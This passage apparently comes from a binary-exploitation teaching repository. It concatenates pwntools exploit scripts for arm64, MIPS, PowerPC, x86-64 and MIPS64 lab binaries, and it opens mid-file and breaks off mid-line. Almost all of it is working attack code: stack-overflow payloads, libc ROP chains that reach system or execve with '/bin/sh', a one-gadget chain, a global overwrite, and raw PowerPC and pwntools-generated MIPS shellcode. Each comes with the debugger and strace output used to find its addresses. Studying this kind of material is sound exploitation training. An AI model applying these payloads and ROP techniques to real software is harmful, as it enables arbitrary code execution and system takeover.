payload += p32(0) # envp 76 | payload += p32(int_0x80_addr) 77 | 78 | p.readuntil('> ') 79 | p.write(payload) 80 | p.interactive() 81 | -------------------------------------------------------------------------------- /pwn/arm64/08-overwrite-global.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble main 5 | Dump of assembler code for function main: 6 | 0x00000000004006fc <+0>: stp x29, x30, [sp, #-32]! 7 | ... 8 | 0x0000000000400718 <+28>: ret 9 | End of assembler dump. 10 | (gdb) b vulnerable 11 | Breakpoint 1 at 0x40067c: file src/08-overwrite-global.c, line 9. 12 | (gdb) b *0x0000000000400714 13 | Breakpoint 2 at 0x400714: file src/08-overwrite-global.c, line 26. 14 | (gdb) c 15 | Continuing. 16 | 17 | Breakpoint 1, vulnerable () at src/08-overwrite-global.c:9 18 | 9 printf("> "); 19 | (gdb) p &buffer[0] 20 | $1 = 0x40007ffd30 "" 21 | (gdb) c 22 | Continuing. 23 | 24 | Breakpoint 2, main (argc=1, argv=0x40007fff08) at src/08-overwrite-global.c:26 25 | 26 } 26 | (gdb) i r $sp 27 | sp 0x40007ffdb0 0x40007ffdb0 28 | """ 29 | 30 | """ 31 | $ qemu-aarch64 -L /usr/aarch64-linux-gnu/ -strace ./bin/arm64/08-overwrite-global 32 | ... 33 | 8744 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 34 | ... 35 | 8744 mmap(NULL,1413976,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0000004000852000 36 | ... 37 | """ 38 | 39 | """ 40 | $ ropper --nocolor --file /usr/aarch64-linux-gnu/lib/libc-2.27.so 41 | 0x00020400: ldp x19, x20, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret; 42 | 0x000ec04c: str x19, [x20]; ldp x19, x20, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret; 43 | """ 44 | 45 | import struct 46 | import sys 47 | 48 | from pwn import * 49 | 50 | context(arch='aarch64', os='linux', endian='little', word_size=64) 51 | 52 | binary_path = './bin/arm64/08-overwrite-global' 53 | 54 | saved_x30_addr = 0x40007ffdb0 + 8 55 | buffer_addr = 0x40007ffd30 56 | libc_addr = 0x0000004000852000 57 | 58 | ldp_x19_x20_ldp_x29_x30_ret_addr = libc_addr + 0x00020400 59 | str_x19_x20_ldp_x29_x30_ret_addr = libc_addr + 0x000ec04c 60 | 61 | binary = ELF(binary_path) 62 | not_called_addr = binary.symbols['not_called'] 63 | x_addr = binary.symbols['x'] 64 | 65 | p = process(binary_path) 66 | #p = gdb.debug([binary_path]) 67 | 68 | payload = '' 69 | payload += 'a' * (saved_x30_addr - buffer_addr) 70 | payload += p64(ldp_x19_x20_ldp_x29_x30_ret_addr) 71 | payload += 'b' * 16 72 | # <- $sp 73 | payload += p64(0) # x29 74 | payload += p64(str_x19_x20_ldp_x29_x30_ret_addr) # x30 75 | payload += p64(0xdeadbabebeefc0de) # x19 76 | payload += p64(x_addr) # x20 77 | # <- $sp 78 | payload += p64(0) # x29 79 | payload += p64(not_called_addr) # x30 80 | 81 | p.readuntil('> ') 82 | p.write(payload) 83 | p.interactive() 84 | -------------------------------------------------------------------------------- /pwn/arm64/03-one-gadget.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble main 5 | Dump of assembler code for function main: 6 | 0x0000000000400678 <+0>: stp x29, x30, [sp, #-32]! 7 | ... 8 | 0x0000000000400690 <+24>: ldp x29, x30, [sp], #32 9 | 0x0000000000400694 <+28>: ret 10 | End of assembler dump. 11 | (gdb) b vulnerable 12 | Breakpoint 1 at 0x40063c: file src/03-one-gadget.c, line 6. 13 | (gdb) b *0x0000000000400690 14 | Breakpoint 2 at 0x400690: file src/03-one-gadget.c, line 17. 15 | (gdb) c 16 | Continuing. 17 | 18 | Breakpoint 1, vulnerable () at src/03-one-gadget.c:6 19 | 6 printf("> "); 20 | (gdb) p &buffer[0] 21 | $1 = 0x40007ffd90 "" 22 | (gdb) c 23 | Continuing. 24 | 25 | Breakpoint 2, main (argc=1, argv=0x40007fff68) at src/03-one-gadget.c:17 26 | 17 } 27 | (gdb) i r $sp 28 | sp 0x40007ffe10 0x40007ffe10 29 | """ 30 | 31 | """ 32 | $ qemu-aarch64 -L /usr/aarch64-linux-gnu/ -strace ./bin/arm64/03-one-gadget 33 | ... 34 | 31623 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 35 | ... 36 | 31623 mmap(NULL,1413976,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0000004000852000 37 | ... 38 | """ 39 | 40 | """ 41 | $ one_gadget /usr/aarch64-linux-gnu/lib/libc-2.27.so 42 | 0x63e80 execl("/bin/sh", x1) 43 | constraints: 44 | x1 == NULL 45 | ... 46 | """ 47 | 48 | """ 49 | ropper --nocolor --file /usr/aarch64-linux-gnu/lib/libc-2.27.so 50 | 0x0002c490: ldr x1, [x29, #0x18]; ldp x29, x30, [sp], #0x20; mov x0, x1; ret; 51 | """ 52 | 53 | import struct 54 | import sys 55 | 56 | from pwn import * 57 | 58 | context(arch='aarch64', os='linux', endian='little', word_size=64) 59 | 60 | binary_path = './bin/arm64/03-one-gadget' 61 | libc_path = '/usr/aarch64-linux-gnu/lib/libc-2.27.so' 62 | 63 | saved_x30_addr = 0x40007ffe10 + 8 64 | buffer_addr = 0x40007ffd90 65 | libc_addr = 0x0000004000852000 66 | 67 | one_gadget_addr = libc_addr + 0x63e80 68 | ldr_x1_x30_ret_addr = libc_addr + 0x0002c490 69 | 70 | libc = ELF(libc_path) 71 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 72 | zero_addr = libc_addr + libc.search(p64(0)).next() 73 | 74 | p = process(binary_path) 75 | #p = gdb.debug([binary_path]) 76 | 77 | # Need to satisfy that x1 == NULL constraint. 78 | payload = '' 79 | payload += 'a' * (saved_x30_addr - buffer_addr - 8) 80 | payload += p64(zero_addr - 0x18) # x29 81 | payload += p64(ldr_x1_x30_ret_addr) 82 | payload += 'b' * 16 83 | payload += p64(0) # x29 84 | payload += p64(one_gadget_addr) # x30 85 | 86 | p.readuntil('> ') 87 | p.write(payload) 88 | p.interactive() 89 | -------------------------------------------------------------------------------- /pwn/mips/06-system-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x00400780 <+0>: addiu sp,sp,-160 7 | 0x00400784 <+4>: sw ra,156(sp) 8 | ... 9 | 0x00400804 <+132>: lw ra,156(sp) 10 | 0x00400808 <+136>: lw s8,152(sp) 11 | 0x0040080c <+140>: addiu sp,sp,160 12 | 0x00400810 <+144>: jr ra 13 | 0x00400814 <+148>: nop 14 | End of assembler dump. 15 | (gdb) b vulnerable 16 | Breakpoint 1 at 0x40079c: file src/06-system-rop.c, line 6. 17 | (gdb) b *0x00400804 18 | Breakpoint 2 at 0x400804: file src/06-system-rop.c, line 11. 19 | (gdb) c 20 | Continuing. 21 | 22 | Breakpoint 1, vulnerable () at src/06-system-rop.c:6 23 | 6 printf("> "); 24 | (gdb) p &buffer[0] 25 | $1 = 0x7fffef28 "\177~\272X\177~\243\f\177|\210D" 26 | (gdb) c 27 | Continuing. 28 | 29 | Breakpoint 2, 0x00400804 in vulnerable () at src/06-system-rop.c:11 30 | 11 } 31 | (gdb) p/x $sp+156 32 | $2 = 0x7fffefac 33 | """ 34 | 35 | """ 36 | $ qemu-mips -L /usr/mips-linux-gnu/ -strace ./bin/mips/06-system-rop 37 | ... 38 | 29541 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 39 | ... 40 | 29541 mmap2(NULL,1638448,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x7f615000 41 | ... 42 | """ 43 | 44 | """ 45 | $ ropper --nocolor --file /usr/mips-linux-gnu/lib/libc-2.27.so 46 | 0x0001b1e8: lw $ra, 0x24($sp); lw $s2, 0x20($sp); lw $s1, 0x1c($sp); lw $s0, 0x18($sp); jr $ra; addiu $sp, $sp, 0x28; 47 | 0x00147638: move $t9, $s1; lw $a0, 0x28($sp); jalr $t9; nop; 48 | """ 49 | 50 | import struct 51 | import sys 52 | 53 | from pwn import * 54 | 55 | context(arch='mips', os='linux', endian='big', word_size=32) 56 | 57 | binary_path = './bin/mips/06-system-rop' 58 | libc_path = '/usr/mips-linux-gnu/lib/libc-2.27.so' 59 | 60 | ra_saved_addr = 0x7fffefac 61 | buffer_addr = 0x7fffef28 62 | libc_addr = 0x7f615000 63 | 64 | lw_s1_s2_addr = libc_addr + 0x0001b1e8 65 | lw_a0_jump_s1_addr = libc_addr + 0x00147638 66 | 67 | libc = ELF(libc_path) 68 | system_addr = libc_addr + libc.symbols['system'] 69 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 70 | 71 | p = process(binary_path) 72 | #p = gdb.debug([binary_path]) 73 | 74 | payload = '' 75 | payload += 'a' * (ra_saved_addr - buffer_addr) 76 | payload += p32(lw_s1_s2_addr) 77 | payload += 'b' * 0x18 78 | payload += p32(0) # s0 79 | payload += p32(system_addr) # s1 80 | payload += p32(0) # s2 81 | payload += p32(lw_a0_jump_s1_addr) # ra 82 | payload += 'c' * 0x28 83 | payload += p32(bin_sh_addr) 84 | 85 | p.readuntil('> ') 86 | p.write(payload) 87 | p.interactive() 88 | -------------------------------------------------------------------------------- /pwn/arm64/07-execve-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble main 5 | Dump of assembler code for function main: 6 | 0x0000000000400678 <+0>: stp x29, x30, [sp, #-32]! 7 | ... 8 | 0x0000000000400690 <+24>: ldp x29, x30, [sp], #32 9 | 0x0000000000400694 <+28>: ret 10 | End of assembler dump. 11 | (gdb) b vulnerable 12 | Breakpoint 1 at 0x40063c: file src/07-execve-rop.c, line 6. 13 | (gdb) b *0x0000000000400690 14 | Breakpoint 2 at 0x400690: file src/07-execve-rop.c, line 17. 15 | (gdb) c 16 | Continuing. 17 | 18 | Breakpoint 1, vulnerable () at src/07-execve-rop.c:6 19 | 6 printf("> "); 20 | (gdb) p &buffer[0] 21 | $1 = 0x40007ffd80 "" 22 | (gdb) c 23 | Continuing. 24 | 25 | Breakpoint 2, main (argc=1650614882, argv=0x6262626262626262) at src/07-execve-rop.c:17 26 | 17 } 27 | (gdb) i r $sp 28 | sp 0x40007ffe00 0x40007ffe00 29 | """ 30 | 31 | """ 32 | $ qemu-aarch64 -L /usr/aarch64-linux-gnu/ -strace ./bin/arm64/07-execve-rop 33 | ... 34 | 27963 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 35 | ... 36 | 27963 mmap(NULL,1413976,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0000004000852000 37 | ... 38 | """ 39 | 40 | """ 41 | $ ropper --nocolor --file /usr/aarch64-linux-gnu/lib/libc-2.27.so 42 | 0x0002c818: ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret; 43 | 0x0008ffd4: mov x2, x22; mov x1, x21; mov x0, x20; blr x19; 44 | 0x000a2aa0: movz x8, #0xdd; svc #0; cmn x0, #0xfff; b.hs #0xa2ab4; ret; 45 | """ 46 | 47 | import struct 48 | import sys 49 | 50 | from pwn import * 51 | 52 | context(arch='aarch64', os='linux', endian='little', word_size=64) 53 | 54 | binary_path = './bin/arm64/07-execve-rop' 55 | libc_path = '/usr/aarch64-linux-gnu/lib/libc-2.27.so' 56 | 57 | saved_x30_addr = 0x40007ffe00 + 8 58 | buffer_addr = 0x40007ffd80 59 | libc_addr = 0x0000004000852000 60 | 61 | ldp_many_addr = libc_addr + 0x0002c818 62 | mov_args_blr_x19_addr = libc_addr + 0x0008ffd4 63 | mov_x8_execve_svc_addr = libc_addr + 0x000a2aa0 64 | 65 | libc = ELF(libc_path) 66 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 67 | 68 | p = process(binary_path) 69 | #p = gdb.debug([binary_path]) 70 | 71 | payload = '' 72 | payload += 'a' * (saved_x30_addr - buffer_addr) 73 | payload += p64(ldp_many_addr) 74 | payload += 'b' * 16 75 | # <- $sp 76 | payload += p64(0) # x29 77 | payload += p64(mov_args_blr_x19_addr) # x30 78 | payload += p64(mov_x8_execve_svc_addr) # x19 79 | payload += p64(bin_sh_addr) # x20 -> x0 80 | payload += p64(0) # x21 81 | payload += p64(0) # x22 82 | 83 | p.readuntil('> ') 84 | p.write(payload) 85 | p.interactive() 86 | -------------------------------------------------------------------------------- /pwn/ppc/05-shellcode-dynamic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x1000054c <+0>: stwu r1,-144(r1) 7 | ... 8 | 0x100005a8 <+92>: lwz r0,4(r11) 9 | 0x100005ac <+96>: mtlr r0 10 | 0x100005b0 <+100>: lwz r31,-4(r11) 11 | 0x100005b4 <+104>: mr r1,r11 12 | 0x100005b8 <+108>: blr 13 | End of assembler dump. 14 | (gdb) b vulnerable 15 | Breakpoint 1 at 0x10000560: file src/05-shellcode-dynamic.c, line 6. 16 | (gdb) b *0x100005a8 17 | Breakpoint 2 at 0x100005a8: file src/05-shellcode-dynamic.c, line 14. 18 | (gdb) c 19 | Continuing. 20 | 21 | Breakpoint 1, vulnerable () at src/05-shellcode-dynamic.c:6 22 | 6 printf("> "); 23 | (gdb) p &buffer[0] 24 | $1 = 0xffffdd98 "\377\377\335", 25 | (gdb) c 26 | Continuing. 27 | 28 | Breakpoint 2, 0x100005a8 in vulnerable () at src/05-shellcode-dynamic.c:14 29 | 14 } 30 | (gdb) p/x $r11+4 31 | $2 = 0xffffde24 32 | """ 33 | 34 | """ 35 | $ qemu-ppc -L /usr/powerpc-linux-gnu/ -strace ./bin/ppc/05-shellcode-dynamic 36 | ... 37 | 24557 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 38 | ... 39 | 24557 mmap2(0x0fe2c000,1848680,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0fe2c000 40 | ... 41 | """ 42 | 43 | """ 44 | $ ropper --nocolor --file /usr/powerpc-linux-gnu/lib/libc-2.27.so 45 | 0x00171014: mtctr r11; bctr; 46 | """ 47 | 48 | import struct 49 | import sys 50 | 51 | from pwn import * 52 | 53 | context(arch='powerpc', os='linux', endian='big', word_size=32) 54 | 55 | binary_path = './bin/ppc/05-shellcode-dynamic' 56 | 57 | saved_pc_addr = 0xffffde24 58 | buffer_addr = 0xffffdd98 59 | libc_addr = 0x0fe2c000 60 | 61 | mtctr_r11_bctr_addr = libc_addr + 0x00171014 62 | 63 | # Adapted from http://shell-storm.org/shellcode/files/shellcode-86.php 64 | shellcode = \ 65 | '\x7c\x3f\x0b\x78' + \ 66 | '\x7c\xa5\x2a\x79' + \ 67 | '\x42\x40\xff\xf9' + \ 68 | '\x7f\x08\x02\xa6' + \ 69 | '\x3b\x18\x01\x34' + \ 70 | '\x98\xb8\xfe\xfb' + \ 71 | '\x38\x78\xfe\xf4' + \ 72 | '\x90\x61\xff\xf8' + \ 73 | '\x38\x81\xff\xf8' + \ 74 | '\x90\xa1\xff\xfc' + \ 75 | '\x3b\xc0\x01\x60' + \ 76 | '\x7f\xc0\x2e\x70' + \ 77 | '\x44\x00\x00\x00' + \ 78 | '/bin/shZ' 79 | 80 | p = process(binary_path) 81 | #p = gdb.debug([binary_path]) 82 | 83 | payload = '' 84 | payload += 'a' * (saved_pc_addr - buffer_addr - 4) 85 | # <- $r1 == $r11 86 | payload += p32(0x42000008) # relative branch to $pc+8 87 | payload += p32(mtctr_r11_bctr_addr) 88 | # <- $r1 + 8 89 | payload += shellcode 90 | 91 | p.readuntil('> ') 92 | p.write(payload) 93 | p.interactive() 94 | -------------------------------------------------------------------------------- /pwn/mips/05-shellcode-dynamic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x004007c0 <+0>: addiu sp,sp,-160 7 | 0x004007c4 <+4>: sw ra,156(sp) 8 | ... 9 | 0x0040085c <+156>: lw ra,156(sp) 10 | 0x00400860 <+160>: lw s8,152(sp) 11 | 0x00400864 <+164>: addiu sp,sp,160 12 | 0x00400868 <+168>: jr ra 13 | 0x0040086c <+172>: nop 14 | End of assembler dump. 15 | (gdb) b vulnerable 16 | Breakpoint 1 at 0x4007dc: file src/05-shellcode-dynamic.c, line 6. 17 | (gdb) b *0x0040085c 18 | Breakpoint 2 at 0x40085c: file src/05-shellcode-dynamic.c, line 13. 19 | (gdb) c 20 | Continuing. 21 | 22 | Breakpoint 1, vulnerable () at src/05-shellcode-dynamic.c:6 23 | 6 printf("> "); 24 | (gdb) p &buffer[0] 25 | $1 = 0x7fffef28 "\177~\272X\177~\243\f\177|\210D" 26 | (gdb) c 27 | Continuing. 28 | 29 | Breakpoint 2, 0x0040085c in vulnerable () at src/05-shellcode-dynamic.c:13 30 | 13 } 31 | (gdb) p/x $sp+156 32 | $2 = 0x7fffefac 33 | """ 34 | 35 | """ 36 | $ qemu-mips -L /usr/mips-linux-gnu/ -strace ./bin/mips/05-shellcode-dynamic 37 | ... 38 | 23704 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 39 | ... 40 | 23704 mmap2(NULL,1638448,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x7f615000 41 | ... 42 | """ 43 | 44 | """ 45 | $ ropper --nocolor --file /usr/mips-linux-gnu/lib/libc-2.27.so 46 | 0x0001b1e8: lw $ra, 0x24($sp); lw $s2, 0x20($sp); lw $s1, 0x1c($sp); lw $s0, 0x18($sp); jr $ra; addiu $sp, $sp, 0x28; 47 | 0x0002d518: move $s5, $s2; move $t9, $s1; jalr $t9; move $a0, $s7; 48 | 0x000f0d3c: move $t9, $s5; jalr $t9; addiu $s6, $sp, 0x50; 49 | 0x000639e8: move $t9, $s6; jalr $t9; nop; 50 | """ 51 | 52 | import struct 53 | import sys 54 | 55 | from pwn import * 56 | 57 | context(arch='mips', os='linux', endian='big', word_size=32) 58 | 59 | binary_path = './bin/mips/05-shellcode-dynamic' 60 | 61 | ra_saved_addr = 0x7fffefac 62 | buffer_addr = 0x7fffef28 63 | libc_addr = 0x7f615000 64 | 65 | lw_s1_s2_addr = libc_addr + 0x0001b1e8 66 | move_s5_s2_jump_s1_addr = libc_addr + 0x0002d518 67 | addiu_s6_sp_0x50_jump_s5_addr = libc_addr + 0x000f0d3c 68 | jump_s6_addr = libc_addr + 0x000639e8 69 | 70 | shellcode = asm(shellcraft.sh()) 71 | 72 | p = process(binary_path) 73 | #p = gdb.debug([binary_path]) 74 | 75 | payload = '' 76 | payload += 'a' * (ra_saved_addr - buffer_addr) 77 | payload += p32(lw_s1_s2_addr) 78 | payload += 'b' * 0x18 79 | payload += p32(0) # s0 80 | payload += p32(addiu_s6_sp_0x50_jump_s5_addr) # s1 81 | payload += p32(jump_s6_addr) # s2 82 | payload += p32(move_s5_s2_jump_s1_addr) # ra 83 | payload += 'c' * 0x50 84 | payload += shellcode 85 | 86 | p.readuntil('> ') 87 | p.write(payload) 88 | p.interactive() 89 | -------------------------------------------------------------------------------- /pwn/ppc/06-system-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x1000052c <+0>: stwu r1,-144(r1) 7 | ... 8 | 0x10000580 <+84>: lwz r0,4(r11) 9 | 0x10000584 <+88>: mtlr r0 10 | 0x10000588 <+92>: lwz r31,-4(r11) 11 | 0x1000058c <+96>: mr r1,r11 12 | 0x10000590 <+100>: blr 13 | End of assembler dump. 14 | (gdb) b vulnerable 15 | Breakpoint 1 at 0x10000540: file src/06-system-rop.c, line 6. 16 | (gdb) b *0x10000580 17 | Breakpoint 2 at 0x10000580: file src/06-system-rop.c, line 11. 18 | (gdb) b *0x10000590 19 | Breakpoint 3 at 0x10000590: file src/06-system-rop.c, line 11. 20 | (gdb) c 21 | Continuing. 22 | 23 | Breakpoint 1, vulnerable () at src/06-system-rop.c:6 24 | 6 printf("> "); 25 | (gdb) p &buffer[0] 26 | $1 = 0xffffdda8 "\377\377\336\b" 27 | (gdb) c 28 | Continuing. 29 | 30 | Breakpoint 2, 0x10000580 in vulnerable () at src/06-system-rop.c:11 31 | 11 } 32 | (gdb) p/x $r11+4 33 | $2 = 0xffffde34 34 | (gdb) c 35 | Continuing. 36 | 37 | Breakpoint 3, 0x10000590 in vulnerable () at src/06-system-rop.c:11 38 | 11 } 39 | (gdb) i r $r1 40 | r1 0xffffde30 4294958640 41 | """ 42 | 43 | """ 44 | $ qemu-ppc -L /usr/powerpc-linux-gnu/ -strace ./bin/ppc/06-system-rop 45 | ... 46 | 21069 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 47 | ... 48 | 21069 mmap2(0x0fe2c000,1848680,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0fe2c000 49 | ... 50 | """ 51 | 52 | """ 53 | $ ropper --nocolor --file /usr/powerpc-linux-gnu/lib/libc-2.27.so 54 | 0x00123b38: lwz r0, 0x34(r1); mr r3, r31; lwz r31, 0x2c(r1); addi r1, r1, 0x30; mtlr r0; blr; 55 | """ 56 | 57 | import struct 58 | import sys 59 | 60 | from pwn import * 61 | 62 | context(arch='powerpc', os='linux', endian='big', word_size=32) 63 | 64 | binary_path = './bin/ppc/06-system-rop' 65 | libc_path = '/usr/powerpc-linux-gnu/lib/libc-2.27.so' 66 | 67 | saved_pc_addr = 0xffffde34 68 | buffer_addr = 0xffffdda8 69 | libc_addr = 0x0fe2c000 70 | 71 | mr_r3_r31_lwz_r31_addr = libc_addr + 0x00123b38 72 | 73 | libc = ELF(libc_path) 74 | system_addr = libc_addr + libc.symbols['system'] 75 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 76 | 77 | p = process(binary_path) 78 | #p = gdb.debug([binary_path]) 79 | 80 | payload = '' 81 | payload += 'a' * (saved_pc_addr - buffer_addr) 82 | payload += p32(mr_r3_r31_lwz_r31_addr) 83 | # <- $r1 + 8 84 | payload += 'b' * (0x2c - 8) 85 | payload += p32(bin_sh_addr) # r31 86 | payload += 'c' * (0x34 - 4 - 0x2c) 87 | payload += p32(mr_r3_r31_lwz_r31_addr) # r0 88 | # <- $r1 + 8 89 | payload += 'd' * (0x34 - 8) 90 | payload += p32(system_addr) # r0 91 | 92 | p.readuntil('> ') 93 | p.write(payload) 94 | p.interactive() 95 | -------------------------------------------------------------------------------- /pwn/x86-64/07-execve-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x4005b7: file src/07-execve-rop.c, line 5. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/x86_64-linux-gnu/libc-2.27.so from remote target... 10 | Reading /lib/x86_64-linux-gnu/.debug/libc-2.27.so from remote target... 11 | 12 | Breakpoint 1, vulnerable () at src/07-execve-rop.c:5 13 | 5 int vulnerable() { 14 | (gdb) i r $rsp 15 | rsp 0x7fffffffddf8 0x7fffffffddf8 16 | (gdb) p &buffer[0] 17 | $1 = 0x7fffffffdd70 "\377\377\377\377" 18 | (gdb) info proc mappings 19 | process 15032 20 | Mapped address spaces: 21 | 22 | Start Addr End Addr Size Offset objfile 23 | ... 24 | 0x7ffff79e4000 0x7ffff7bcb000 0x1e7000 0x0 /lib/x86_64-linux-gnu/libc-2.27.so 25 | 0x7ffff7bcb000 0x7ffff7dcb000 0x200000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 26 | 0x7ffff7dcb000 0x7ffff7dcf000 0x4000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 27 | 0x7ffff7dcf000 0x7ffff7dd1000 0x2000 0x1eb000 /lib/x86_64-linux-gnu/libc-2.27.so 28 | ... 29 | """ 30 | 31 | """ 32 | $ ropper --nocolor --file /lib/x86_64-linux-gnu/libc-2.27.so 33 | 0x00000000000439c8: pop rax; ret; 34 | 0x000000000002155f: pop rdi; ret; 35 | 0x0000000000023e6a: pop rsi; ret; 36 | 0x0000000000001b96: pop rdx; ret; 37 | 0x00000000000013c0: syscall; 38 | """ 39 | 40 | import struct 41 | import sys 42 | 43 | from pwn import * 44 | 45 | context(arch='amd64', os='linux', endian='little', word_size=64) 46 | 47 | binary_path = './bin/x86-64/07-execve-rop' 48 | libc_path = '/lib/x86_64-linux-gnu/libc-2.27.so' 49 | 50 | vulnerable_ret_addr = 0x7fffffffddf8 51 | buffer_addr = 0x7fffffffdd70 52 | libc_addr = 0x7ffff79e4000 53 | 54 | pop_rax_ret_addr = libc_addr + 0x00000000000439c8 55 | pop_rdi_ret_addr = libc_addr + 0x000000000002155f 56 | pop_rsi_ret_addr = libc_addr + 0x0000000000023e6a 57 | pop_rdx_ret_addr = libc_addr + 0x0000000000001b96 58 | syscall_addr = libc_addr + 0x00000000000013c0 59 | 60 | libc = ELF(libc_path) 61 | system_addr = libc_addr + libc.symbols['system'] 62 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 63 | 64 | retq_asm = asm('retq') 65 | retq_addr = libc_addr + libc.search(retq_asm).next() 66 | 67 | p = process(binary_path) 68 | #p = gdb.debug([binary_path]) 69 | 70 | payload = '' 71 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 72 | payload += p64(retq_addr) # align stack 73 | payload += p64(pop_rax_ret_addr) 74 | payload += p64(0x3b) # execve 75 | payload += p64(pop_rdi_ret_addr) 76 | payload += p64(bin_sh_addr) 77 | payload += p64(pop_rsi_ret_addr) 78 | payload += p64(0) 79 | payload += p64(pop_rdx_ret_addr) 80 | payload += p64(0) 81 | payload += p64(syscall_addr) 82 | 83 | p.readuntil('> ') 84 | p.write(payload) 85 | p.interactive() 86 | -------------------------------------------------------------------------------- /pwn/mips64/06-system-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x0000000120000b80 <+0>: daddiu sp,sp,-160 7 | 0x0000000120000b84 <+4>: sd ra,152(sp) 8 | ... 9 | 0x0000000120000bf8 <+120>: ld ra,152(sp) 10 | 0x0000000120000bfc <+124>: ld s8,144(sp) 11 | 0x0000000120000c00 <+128>: ld gp,136(sp) 12 | 0x0000000120000c04 <+132>: daddiu sp,sp,160 13 | 0x0000000120000c08 <+136>: jr ra 14 | 0x0000000120000c0c <+140>: nop 15 | End of assembler dump. 16 | (gdb) b vulnerable 17 | Breakpoint 1 at 0x120000ba0: file src/06-system-rop.c, line 6. 18 | (gdb) b *0x0000000120000bf8 19 | Breakpoint 2 at 0x120000bf8: file src/06-system-rop.c, line 11. 20 | (gdb) c 21 | Continuing. 22 | 23 | Breakpoint 1, vulnerable () at src/06-system-rop.c:6 24 | 6 printf("> "); 25 | (gdb) p &buffer[0] 26 | $1 = 0x40007ffd70 "" 27 | (gdb) c 28 | Continuing. 29 | 30 | Breakpoint 2, 0x0000000120000bf8 in vulnerable () at src/06-system-rop.c:11 31 | 11 } 32 | (gdb) p/x $sp+152 33 | $2 = 0x40007ffe08 34 | """ 35 | 36 | """ 37 | $ qemu-mips64 -L /usr/mips64-linux-gnuabi64/ -strace ./bin/mips64/06-system-rop 38 | ... 39 | 14024 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 40 | ... 41 | 14024 mmap(NULL,1880864,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x000000400085e000 42 | """ 43 | 44 | """ 45 | $ ropper --nocolor --file /usr/mips64-linux-gnuabi64/lib/libc-2.27.so 46 | 0x00000000000e941c: ld $ra, 0x28($sp); ld $s2, 0x18($sp); ld $s1, 0x10($sp); ld $s0, 8($sp); jr $ra; daddiu $sp, $sp, 0x30; 47 | 0x0000000000050b34: move $t9, $s1; jalr $t9; ld $a0, 0x38($sp); 48 | 0x0000000000082824: move $t9, $s0; jalr $t9; nop; 49 | """ 50 | 51 | import struct 52 | import sys 53 | 54 | from pwn import * 55 | 56 | context(arch='mips64', os='linux', endian='big', word_size=64) 57 | 58 | binary_path = './bin/mips64/06-system-rop' 59 | libc_path = '/usr/mips64-linux-gnuabi64/lib/libc-2.27.so' 60 | 61 | ra_saved_addr = 0x40007ffe08 62 | buffer_addr = 0x40007ffd70 63 | libc_addr = 0x000000400085e000 64 | 65 | ld_s0_s1_addr = libc_addr + 0x00000000000e941c 66 | ld_a0_sp_0x38_jump_s1_addr = libc_addr + 0x0000000000050b34 67 | jump_s0_addr = libc_addr + 0x0000000000082824 68 | 69 | libc = ELF(libc_path) 70 | system_addr = libc_addr + libc.symbols['system'] 71 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 72 | 73 | p = process(binary_path) 74 | #p = gdb.debug([binary_path]) 75 | 76 | payload = '' 77 | payload += 'a' * (ra_saved_addr - buffer_addr) 78 | payload += 